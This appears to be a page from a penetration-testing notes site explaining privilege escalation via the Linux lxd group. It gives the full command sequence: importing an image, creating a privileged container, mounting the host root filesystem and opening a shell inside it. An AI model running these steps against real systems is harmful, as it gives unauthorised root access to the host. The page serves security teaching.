LXD/LXC

LXD - Linux Daemon LXC - Linux Containers

Pre-Requisites

must be a member of lxd group

Sample Exploitation

Check the id command

$ id

uid=1000(container-user) gid=1000(container-user) groups=1000(container-user),116(lxd)

From here on, there are now several ways in which we can exploit LXC/LXD. We can either create our own container and transfer it to the target system or use an existing container.
```
$ cd ContainerImages
$ ls

ubuntu-template.tar.xz
```

Assuming that there is no security (passwords etc), we import the container as an image

$ lxc image import ubuntu-template.tar.xz --alias ubuntutemp
$ lxc image list

+-------------------------------------+--------------+--------+-----------------------------------------+--------------+-----------------+-----------+-------------------------------+
|                ALIAS                | FINGERPRINT  | PUBLIC |               DESCRIPTION               | ARCHITECTURE |      TYPE       |   SIZE    |          UPLOAD DATE          |
+-------------------------------------+--------------+--------+-----------------------------------------+--------------+-----------------+-----------+-------------------------------+
| ubuntu/18.04 (v1.1.2)               | 623c9f0bde47 | no    | Ubuntu bionic amd64 (20221024_11:49)     | x86_64       | CONTAINER       | 106.49MB  | Oct 24, 2022 at 12:00am (UTC) |
+-------------------------------------+--------------+--------+-----------------------------------------+--------------+-----------------+-----------+-------------------------------+

Enable the security.privileges flag

$ lxc init ubuntutemp privesc -c security.privileged=true
$ lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

Start the container and log in to it

$ lxc start privesc
$ lxc exec privesc /bin/bash
# ls -l /mnt/root

PreviousCron Job Abuse NextDocker

Last updated 2 years ago